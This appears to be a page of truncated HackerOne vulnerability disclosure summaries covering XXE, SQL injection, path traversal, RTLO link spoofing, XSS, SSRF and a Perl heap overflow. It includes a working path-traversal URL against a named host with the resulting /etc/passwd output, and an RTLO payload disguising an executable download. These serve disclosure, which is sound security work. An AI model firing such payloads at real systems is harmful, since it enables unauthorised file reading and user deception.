HackerOne Reports

Summary: ======== Weblate users in the Translate group (or those with the ability to upload translation files) can trigger XML External Entity Execution. This is a well known and high/critical vector of attack that often can completely compromise the security of a web application or in some cases lead to …

Summary ======= The /api/ does not enforce access control on the translation files, allowing anyone to download full translation files. See the screenshot for an example project being viewed by an anonymous account that is configured to have no permissions. Description ======= On my local setup running Weblate 2.15-dev, I …

**Summary:** https://████ is vulnerable to SQL Injection. **Description:** The `███████` parameter in `https://█████████/██████` does not properly sanitize input, thus allowing an attacker to execute SQL queries on the server! ## Impact This is a **high impact** vulnerability! I saw a list of tables which I'm guessing contain confidential information such …

# Description Shopify allows developers to create a special type of application called a "[Sales Channel](https://help.shopify.com/api/sdks/sales-channel-sdk)". Developers are allowed to upload a 16x16 SVG "Navigation Icon" for their app provided the SVG follows the [design guidelines](https://help.shopify.com/api/sdks/sales-channel-sdk/design-guidelines/checklist#navigation-icon) which limits the allowed elements and attributes. For some reason when the SVG contains …

Hi. Attacker can read arbitrary file in system via next query: ``` http://doc.rt.informaticacloud.com/infocenter/ActiveVOS/v92/topic/com.activee.bpep.doc/images/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd ``` You can see the response here: {F188500} ``` root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:103:108::/var/lib/landscape:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin …

##Summary Attacker can embed `RTLO` character at the following URL https://www.khanacademy.org/computer-programming/link_redirector?url= to trick the user to download suspicious files. ##Steps to reproduce * Visit https://www.khanacademy.org/computer-programming/link_redirector?url= * add the following payload to the url parameter `https://example.com/so%E2%80%AEgnp.exe` [https://www.khanacademy.org/computer-programming/link_redirector?url=https://example.com/so%E2%80%AEgnp.exe](https://www.khanacademy.org/computer-programming/link_redirector?url=https://example.com/so%E2%80%AEgnp.exe) * After visiting the URL you will see the following link appearing on the …

Twitter allows to comment on anyone's tweet. While testing this feature, observed that one can post comment on tweet which will be invisible to the victim whom the reply was posted and would be visible to any other twitter user. This can allow an Attacker to abuse victim on a …

> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! **Summary:** The OAuth screen …

Private tweets can be used to keep any user's tweet secret from rest of twitter world. Once the user changes his setting from private tweets to public tweets, all his secret tweets become visible. This can become a major issue causing global distributed attacks **Steps to Reproduce** 1. Assume the …

Text injection possible at https://media.hboeck.de if we craft url like this: https://media.hboeck.de/?c=http://www.example.com We can see the output on web app. ## Impact Defacement of website by following crafted link

## Description There is a feature on the Phabricator Slowvote application which allows creating polls and asking questions. The poll creator can choose to only allow people who voted to actually see the poll results. However, it seems that by sending an illegal vote a user can still see the …

**Summary:** The Marketo contact form available on the www.hackerone.com website is affected by a cross-site scripting vulnerability, caused by an insecure 'message' event listener installed on the page. Whilst this could allow an attacker to execute JavaScript in the context of the www.hackerone.com application, there were some restrictions which reduced …

Normally, a call to `https://duckduckgo.com/iu` contains a query parameter (`u`) with some path using the domain `yimg.com`. This call will succeed in most cases. {F337121} And if we change that path to something like `https://google.com` it's rejected. {F337118} However, it appears that the check that ensures that `yimg.com` is the …

The `Oauth::Jira::AuthorizationsController#access_token` endpoint is vulnerable to a blind SSRF vulnerability. The vulnerability allows an attacker to make arbitrary HTTP/HTTPS requests inside a GitLab instance's network. # Proof of concept To reproduce the vulnerability, follow the steps below. - spin up a GitLab EE instance with the latest version (11.2.1-ee) - …

pack() may cause a heap buffer write overflow with a large item count. * Reported to the [Perl security mailing list](https://rt.perl.org/Public/Bug/Display.html?id=131844) on 5 Aug 2017. * Confirmed as a security flaw by TonyC on 30 Jan 2018 * CVE-2018-6913 assigned to this flaw on 11 Feb 2018 * [Public security …